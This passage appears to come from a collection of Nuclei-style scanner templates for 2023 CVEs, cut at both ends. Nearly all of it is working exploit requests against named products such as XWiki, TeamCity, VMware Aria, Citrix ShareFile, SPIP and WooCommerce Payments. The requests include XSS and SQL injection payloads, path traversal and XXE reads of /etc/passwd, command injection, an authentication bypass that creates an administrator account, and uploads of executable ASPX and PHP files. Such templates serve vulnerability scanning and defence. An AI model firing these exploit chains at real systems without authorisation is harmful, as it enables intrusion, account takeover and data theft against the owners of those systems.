{{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["{{md5(string)}}"]}],"extractors":[{"type":"regex","name":"nonce","part":"body_1","group":1,"regex":["WprConfig\\s*=\\s*{[^}]*\"nonce\"\\s*:\\s*\"([^\"]*)\""],"internal":true},{"type":"regex","name":"filename","part":"body_2","group":1,"regex":["wp-content\\\\\\/uploads\\\\\\/wpr-addons\\\\\\/forms\\\\\\/(.*?).php"],"internal":true}]}]},{"id":"CVE-2023-4451","info":{"name":"Cockpit - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/install/index.php?1692443074&space=%3Cimg%20src=1%20onerror=alert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Space :<img src=1 onerror=alert(document.domain)>: does not exist"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-0334","info":{"name":"ShortPixel Adaptive Images < 3.6.3 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?SPAI_VJS=%3C/script%3E%3Cimg%20src%3D1%20onerror%3Dalert(document.domain)%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"shortpixel\") && contains(body, \"</script><img src=1 onerror=alert(document.domain)>\")"],"condition":"and"}]}]},{"id":"CVE-2023-23491","info":{"name":"Quick Event Manager < 9.7.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=qem_ajax_calendar&category=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"text/html\")","contains(body, \"<script>alert(document.domain)</script>\")","contains(body, \"qem_calendar\")"],"condition":"and"}]}]},{"id":"CVE-2023-6895","info":{"name":"Hikvision IP ping.php - Command Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/php/ping.php"],"body":"jsondata%5Btype%5D=99&jsondata%5Bip%5D={{command}}","headers":{"Content-Type":"application/x-www-form-urlencoded"},"payloads":{"command":["id","cmd /c ipconfig"]},"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["Windows IP","((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-39143","info":{"name":"PaperCut < 22.1.3 - Path Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/custom-report-example/..\\..\\..\\deployment\\sharp\\icons\\home-app.png"],"matchers":[{"type":"dsl","dsl":["content_length == 1655","status_code == 200","contains(to_lower(content_type), \"image/png\")","contains(hex_encode(body), \"89504e470d0a1a0a\")"],"condition":"and"}]}]},{"id":"CVE-2023-6023","info":{"name":"VertaAI ModelDB - Path Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v1/artifact/getArtifact?artifact_path=../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"header","words":["application/octet-stream","filename="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-35156","info":{"name":"XWiki >= 6.0-rc-1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/xwiki/bin/get/FlamingoThemes/Cerulean?xpage=xpart&vm=delete.vm&xredirect=javascript:alert(document.domain)","{{BaseURL}}/bin/get/FlamingoThemes/Cerulean?xpage=xpart&vm=delete.vm&xredirect=javascript:alert(document.domain)"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["cancel\" href=\"javascript:alert(document.domain)"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200,401]}]}]},{"id":"CVE-2023-27922","info":{"name":"Newsletter < 7.6.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=newsletter_system_status&a%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"text/html\")","contains(tolower(body_2), \"_newsletter_\")","contains(body_2, \"><script>alert(document_domain)</script>\")"],"condition":"and"}]}]},{"id":"CVE-2023-27159","info":{"name":"Appwrite <=1.2.1 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/v1/avatars/favicon?url=http://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: Appwrite-Server"]}]}]},{"id":"CVE-2023-3345","info":{"name":"LMS by Masteriyo < 1.6.8 - Information Exposure","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/profile.php HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-json/masteriyo/v1/users/ HTTP/1.1\nHost: {{Hostname}}\nX-WP-Nonce: {{nonce}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["\"username\":","\"email\":","\"roles\":"],"condition":"and"},{"type":"word","part":"header_3","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"nonce","part":"body","group":1,"regex":["\"nonce\":\"([a-z0-9]+)\",\"versionString"],"internal":true}]}]},{"id":"CVE-2023-42793","info":{"name":"JetBrains TeamCity < 2023.05.4 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["DELETE /app/rest/users/id:1/tokens/RPC2 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","POST /app/rest/users/id:1/tokens/RPC2 HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/dataDir.html?action=edit&fileName=config%2Finternal.properties&content=rest.debug.processes.enable=true HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Bearer {{token}}\nContent-Type: application/x-www-form-urlencoded\n","POST /admin/admin.html?item=diagnostics&tab=dataDir&file=config/internal.properties HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Bearer {{token}}\nContent-Type: application/x-www-form-urlencoded\n","POST /app/rest/debug/processes?exePath=echo&params={{randstr}} HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Bearer {{token}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["<token name=\"RPC2\" creationTime"]},{"type":"word","part":"body_5","words":["StdOut:{{randstr}}"]}],"extractors":[{"type":"regex","part":"body_2","name":"token","group":1,"regex":["value=\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2023-6505","info":{"name":"Prime Mover < 1.9.3 - Sensitive Data Exposure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/uploads/prime-mover-export-files/1/"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Index of /wp-content/uploads/prime-mover-export-files/1",".wprime"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-20887","info":{"name":"VMware VRealize Network Insight - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /saas./resttosaasservlet HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-thrift\n\n[1,\"createSupportBundle\",1,0,{\"1\":{\"str\":\"1111\"},\"2\":{\"str\":\"`{{cmd}}`\"},\"3\":{\"str\":\"value3\"},\"4\":{\"lst\":[\"str\",2,\"AAAA\",\"BBBB\"]}}]\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"rec\":"]},{"type":"word","part":"header","words":["application/x-thrift"]},{"type":"word","part":"body","negative":true,"words":["Provided invalid node Id","Invalid nodeId"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-2130","info":{"name":"Purchase Order Management v1.0 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/suppliers/view_details.php?id=1'+AND+(SELECT+9687+FROM+(SELECT(SLEEP(6)))pnac)+AND+'ARHJ'='ARHJ"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(header, \"text/html\")","contains(body, \"Supplier Name\")"],"condition":"and"}]}]},{"id":"CVE-2023-47115","info":{"name":"Label Studio - Cross-Site Scripting","severity":"high"},"requests":[{"raw":["GET /user/login/ HTTP/1.1\nHost: {{Hostname}}\n","POST /user/signup/?&next=/projects/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncsrfmiddlewaretoken={{csrftoken}}&email={{randstr_1}}%40{{randstr_1}}.{{randstr_1}}&password={{randstr_2}}&allow_newsletters=false\n","GET /api/current-user/whoami HTTP/1.1\nHost: {{Hostname}}\n","POST /api/users/{{id}}/avatar/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarytZZRQ9D2LS0PMsHF\n\n------WebKitFormBoundarytZZRQ9D2LS0PMsHF\nContent-Disposition: form-data; name=\"avatar\"; filename=\"nuclei.html\"\nContent-Type: image/png\n\n{{hex_decode(\"89504E470D0A1A0A0000000D4948445200000009000000080802000000A4AF42E200000046494441543C7363726970743E616C65727428646F63756D656E742E646F6D61696E293C2F7363726970743E\")}}\n------WebKitFormBoundarytZZRQ9D2LS0PMsHF\n","GET /api/current-user/whoami HTTP/1.1\nHost: {{Hostname}}\n","GET {{filename}} HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"xpath","name":"csrftoken","internal":true,"attribute":"value","xpath":["/html/body/div/form/input"]},{"type":"json","part":"body","name":"id","internal":true,"json":[".id"]},{"type":"json","part":"body","name":"filename","internal":true,"json":[".avatar"]}],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, 'text/html')","contains(body, \"<script>alert(document.domain)</script>\")"],"condition":"and"}]}]},{"id":"CVE-2023-27372","info":{"name":"SPIP - Remote Command Execution","severity":"critical"},"requests":[{"raw":["GET /spip.php?page=spip_pass HTTP/1.1\nHost: {{Hostname}}\n","POST /spip.php?page=spip_pass HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\npage=spip_pass&formulaire_action=oubli&formulaire_action_args={{csrf}}&oubli=s:19:\"<?php phpinfo(); ?>\";\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["PHP Extension","PHP Version","<!DOCTYPE html"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name='formulaire_action_args'[^>]*value='([^']*)'"],"internal":true,"part":"body_1"},{"type":"regex","group":1,"regex":[">PHP Version <\\/td><td class=\"v\">([0-9.]+)"],"part":"body_2"}]}]},{"id":"CVE-2023-37728","info":{"name":"IceWarp Webmail Server v10.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/?color=%22%3e%3cimg%20src%20onerror%3dalert(document.domain)%3e%3c%22%27","{{BaseURL}}/?color=%22%3e%3cimg%20src%20onerror%3dalert(document.domain)%3e%3c%22%27"],"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(header, \"IceWarp\") || contains(body, \"IceWarp WebClient\")","contains(body, \"<img src onerror=alert(document.domain)>\")"],"condition":"and"}]}]},{"id":"CVE-2023-28432","info":{"name":"MinIO Cluster Deployment - Information Disclosure","severity":"high"},"requests":[{"raw":["POST /minio/bootstrap/v1/verify HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"MINIO_ROOT_PASSWORD\":","\"MINIO_ROOT_USER\":","\"MinioEnv\":"],"condition":"or"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-28121","info":{"name":"WooCommerce Payments - Unauthorized Admin Access","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nX-WCPAY-PLATFORM-CHECKOUT-USER: 1\nContent-Type: application/x-www-form-urlencoded\n\nrest_route=%2Fwp%2Fv2%2Fusers&username={{username}}&email={{email}}&password={{password}}&roles=administrator\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"registered_date\":","\"username\":","\"email\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[201]}],"extractors":[{"type":"dsl","dsl":["\"WP_USERNAME: \"+ username","\"WP_PASSWORD: \"+ password"]}]}]},{"id":"CVE-2023-3846","info":{"name":"MooDating 1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/pagesi3efi%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3ebdk84/no-permission-role?access_token&=redirect_url=aHR0cHM6Ly9kZW1vLm1vb2RhdGluZ3NjcmlwdC5jb20vbWVldF9tZS9pbmRleC9tZWV0X21l"],"matchers":[{"type":"dsl","dsl":["status_code == 404","contains(content_type, \"text/html\")","contains_all(body, \"><img src=a onerror=alert(document.domain)>\", \"mooDating\")"],"condition":"and"}]}]},{"id":"CVE-2023-2023","info":{"name":"Custom 404 Pro < 3.7.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=c4p-main&s={{randstr}}%22%20style=animation-name:rotation%20onanimationstart=alert(document.domain)// HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"onanimationstart=alert(document.domain)//\")","contains(body_2, \"Custom 404 Pro\")"],"condition":"and"}]}]},{"id":"CVE-2023-0942","info":{"name":"WordPress Japanized for WooCommerce <2.5.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=wc4jp-options&tab=a</script><svg/onload=alert(document.domain)> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"<svg/onload=alert(document.domain)>\") && contains(body_2, \"woocommerce-for-japan\")"],"condition":"and"}]}]},{"id":"CVE-2023-24489","info":{"name":"Citrix ShareFile StorageZones Controller - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /documentum/upload.aspx?parentid={{url_encode(padding)}}&raw=1&unzip=on&uploadid={{fileName}}\\..\\..\\..\\cifs&filename={{fileName}}.aspx HTTP/1.1\nHost: {{Hostname}}\n\n<%@ Page Language=\"C#\" Debug=\"true\" Trace=\"false\" %>\n<script Language=\"c#\" runat=\"server\">\nvoid Page_Load(object sender, EventArgs e)\n{\n    Response.Write(\"{{randstr}}\");\n}\n</script>\n"],"payloads":{"padding":"helpers/payloads/citrix_paddings.txt"},"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["body == \"ERROR: The method or operation is not implemented.\"","status_code == 200"],"condition":"and"}],"extractors":[{"type":"dsl","dsl":["BaseURL+ \"/cifs/\" + fileName + \".aspx\""]}]}]},{"id":"CVE-2023-27587","info":{"name":"ReadToMyShoe - Generation of Error Message Containing Sensitive Information","severity":"medium"},"requests":[{"raw":["POST /api/add-article-by-text HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nContent-Type: application/json\n\n{\n  \"title\":\"Kernsicherheitstest\",\n  \"body\":\"Kernsicherheitstest\"\n}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["!contains((body), 'https://texttospeech.googleapis.com/v1beta1/text:synthesize?key=REDACTED')"]},{"type":"word","words":["Caused by:","TTS request failed"],"condition":"and"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2023-20888","info":{"name":"VMware Aria Operations for Networks - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /api/auth/login HTTP/2\nHost: {{Hostname}}\nContent-Type: application/json;charset=UTF-8\nX-Vrni-Csrf-Token: null\n\n{\"username\":\"{{username}}\",\"password\":\"{{password}}\",\"domain\":\"localdomain\"}\n","POST /api/events/push-notifications HTTP/2\nHost: {{Hostname}}\nX-Vrni-Csrf-Token: {{csrf}}\nContent-Type: application/json\n\n{\"endOffset\": \"{{ generate_java_gadget(\"dns\", \"http://{{interactsh-url}}\", \"base64\") }} \"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[500]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["csrfToken\":\"([a-z0-9A-Z/+=]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2023-42344","info":{"name":"OpenCMS - XML external entity (XXE)","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/opencms/cmisatom/cmis-online/query","{{BaseURL}}/cmisatom/cmis-online/query"],"headers":{"Content-Type":"application/xml;charset=UTF-8","Referer":"{{RootURL}}"},"body":"<?xml version='1.0' encoding='UTF-8'?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]><cmis:query xmlns:cmis=\"<http://docs.oasis-open.org/ns/cmis/core/200908/>\"><cmis:statement>&test;</cmis:statement><cmis:searchAllVersions>false</cmis:searchAllVersions><cmis:includeAllowableActions>false</cmis:includeAllowableActions><cmis:includeRelationships>none</cmis:includeRelationships><cmis:renditionFilter>cmis:none</cmis:renditionFilter><cmis:maxItems>100</cmis:maxItems><cmis:skipCount>0</cmis:skipCount></cmis:query>\n","stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","invalidArgument"],"condition":"and"}]}]},{"id":"CVE-2023-3765","info":{"name":"MLflow Absolute Path Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/ajax-api/2.0/mlflow-artifacts/artifacts?path=C:/"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"is_dir\":","\"path\":","\"files\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-25346","info":{"name":"ChurchCRM 4.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /session/begin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nUser={{username}}&Password={{password}}\n","GET /v2/person/not-found?id=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"<script>alert(document.domain)</script>\")","contains(body_2, \"ChurchCRM\")"],"condition":"and"}]}]},{"id":"CVE-2023-4168","info":{"name":"Adlisting Classified Ads 2.14.0 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ad-list-search?keyword=&lat=&long=&long=&lat=&location=&category=&keyword="],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains_all(body, \"google_map_key\", \"api_key\", \"auth_domain\")"],"condition":"and"}]}]},{"id":"CVE-2023-4115","info":{"name":"PHPJabbers Cleaning Business 1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?controller=pjFront&action=pjActionServices&locale=1&index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains_all(body, \"Enquiry summary\", \"><script>alert(document.domain)</script>\")"],"condition":"and"}]}]},{"id":"CVE-2023-1546","info":{"name":"MyCryptoCheckout < 2.124 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=mycryptocheckout&tab=autosettlements&\"><script>alert(/XSS/)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"scriptalert(/XSS/)/script\")","contains(body_2, \"mycryptocheckout\")"],"condition":"and"}]}]},{"id":"CVE-2023-30868","info":{"name":"Tree Page View Plugin < 1.6.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/edit.php?page=cms-tpv-page-post&post_type=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(content_type_2, \"text/html\")","contains(body_2, \"%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\") && contains(body_2, \"CMS Tree Page View\")","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2023-48241","info":{"name":"XWiki < 4.10.15 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/bin/get/XWiki/SuggestSolrService?outputSyntax=plain&media=json&nb=1000&query=q%3D*%3A*%0Aq.op%3DAND%0Afq%3Dtype%3ADOCUMENT%0Afl%3Dtitle_%2C+reference%2C+links%2C+doccontentraw_%2C+objcontent__&input=+","{{BaseURL}}/xwiki/bin/get/XWiki/SuggestSolrService?outputSyntax=plain&media=json&nb=1000&query=q%3D*%3A*%0Aq.op%3DAND%0Afq%3Dtype%3ADOCUMENT%0Afl%3Dtitle_%2C+reference%2C+links%2C+doccontentraw_%2C+objcontent__&input=+"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"reference\":","title_\":"],"condition":"or"},{"type":"dsl","dsl":["contains(body, \"services.localization.render\")","contains(header, \"application/json\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-48023","info":{"name":"Anyscale Ray 2.6.3 and 2.8.0 - Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/log_proxy?url=http://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["<h1> Interactsh Server </h1>"]}]}]},{"id":"CVE-2023-6114","info":{"name":"Duplicator < 1.5.7.1; Duplicator Pro < 4.5.14.2 - Unauthenticated Sensitive Data Exposure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/backups-dup-lite/tmp/","{{BaseURL}}/wp-content/backups-dup-pro/tmp/"],"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, '/tmp') && contains(body, '<title>Index of')"],"condition":"and"}]}]},{"id":"CVE-2023-2009","info":{"name":"Pretty Url <= 1.5.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog=((username))&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=prettyurls HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin.php?page=prettyurls HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_wpnonce={{nonce}}&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dprettyurls&id=&category=accordions%7Epost_type&url=%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E&meta_title=&meta_description=&meta_keyword=\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(body_3, \"<img src=x onerror=alert(document.domain)>\")","contains(body_3, \"prettyurls\")"],"condition":"and"}],"extractors":[{"type":"regex","internal":true,"name":"nonce","part":"body","group":1,"regex":["name=\"_wpnonce\" value=\"([0-9a-z]+)\" />"]}]}]},{"id":"CVE-2023-41265","info":{"name":"Qlik Sense Enterprise - HTTP Request Smuggling","severity":"critical"},"requests":[{"raw":["GET /resources/qmc/fonts/CVE-2023-41265.ttf HTTP/1.1\nHost: {{Hostname}}\nCookie: X-Qlik-Session=13333333-3333-3333-3333-333333333337\nContent-Type: text/html\nContent-Length: 5\nTransfer-Encoding: chunked\n\n;\n\n"],"unsafe":true,"matchers":[{"type":"dsl","dsl":["status_code == 400","contains(to_lower(set_cookie), 'x-qlik-session')","contains(header, 'Bad Request')"],"condition":"and"}]}]},{"id":"CVE-2023-20864","info":{"name":"VMware Aria Operations for Logs - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /csrf HTTP/1.1\nHost: {{Hostname}}\nX-Csrf-Token: Fetch\n","POST /api/v2/internal/cluster/applyMembership HTTP/1.1\nHost: {{Hostname}}\nX-CSRF-Token: {{xcsrftoken}}\nContent-type: application/octet-stream\n\n{{generate_java_gadget(\"dns\", \"http://{{interactsh-url}}\", \"raw\")}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["\"errorMessage\":\"Internal error"]}],"extractors":[{"type":"kval","name":"xcsrftoken","group":1,"internal":true,"kval":["X_CSRF_Token"]}]}]},{"id":"CVE-2023-36346","info":{"name":"POS Codekop v2.0 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/print.php?nm_member=<script>alert(document.location)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.location)</script>","<title>print</title>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-6379","info":{"name":"OpenCMS 14 & 15 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}{{paths}}"],"payloads":{"paths":["/tagebuch/eintraege/index.html?reloaded&page=1\">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E","/list-editor/index.html?reloaded&page=3\">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E","/advanced-elements/list/index.html?reloaded&sort=date_asc&page=3\">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E","/advanced-elements/list/list-filters/index.html?reloaded&sort=date_asc&page=2\">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E","/lists/compact/index.html?reloaded&sort=date_desc&page=2\">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E","/lists/elaborate/index.html?reloaded&sort=date_desc&page=2\">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E","/lists/text-tiles/index.html?reloaded&sort=date_asc&page=2\">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E","/lists/masonry/index.html?reloaded&sort=date_asc&page=2\">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E","/blog/articles/index.html?reloaded&page=2\">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E","/advanced-elements/form/index.html?formsubmit=12&formaction1=submit&InputField-11939054842=mrs&InputField-21939054842=190806&InputField-31939054842=403105&InputField-41939054842=2&InputField-51939054842=&InputField-61939054842=1&captcha_token_id=1\"><script>alert(document.domain)<%2fscript>ufs5prh3qfe&captchaphrase1939054842=1","/content-elements/job-ad/index.html?reloaded&sort=date_desc&page=1\">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E"]},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script>\" />","OpenCms"],"condition":"and"},{"type":"word","part":"content_type","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-39598","info":{"name":"IceWarp Email Client - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/?mid={{to_lower(rand_base(4))}}\"><img src=x onerror=confirm(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","words":["<img src=x onerror=confirm(document.domain)>","icewarp"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-4596","info":{"name":"WordPress Plugin Forminator 1.24.6 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 15s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryBLOYSueQAdgN2PRe\n\n------WebKitFormBoundaryBLOYSueQAdgN2PRe\nContent-Disposition: form-data; name=\"textarea-1\"\n\n{{randstr}}\n------WebKitFormBoundaryBLOYSueQAdgN2PRe\nContent-Disposition: form-data; name=\"phone-1\"\n\n{{rand_int(10)}}\n------WebKitFormBoundaryBLOYSueQAdgN2PRe\nContent-Disposition: form-data; name=\"email-1\"\n\ntest@gmail.com\n------WebKitFormBoundaryBLOYSueQAdgN2PRe\nContent-Disposition: form-data; name=\"name-1\"\n\n{{randstr}}\n------WebKitFormBoundaryBLOYSueQAdgN2PRe\nContent-Disposition: form-data; name=\"postdata-1-post-image\"; filename=\"{{randstr}}.php\"\nContent-Type: application/x-php\n\n<?php echo 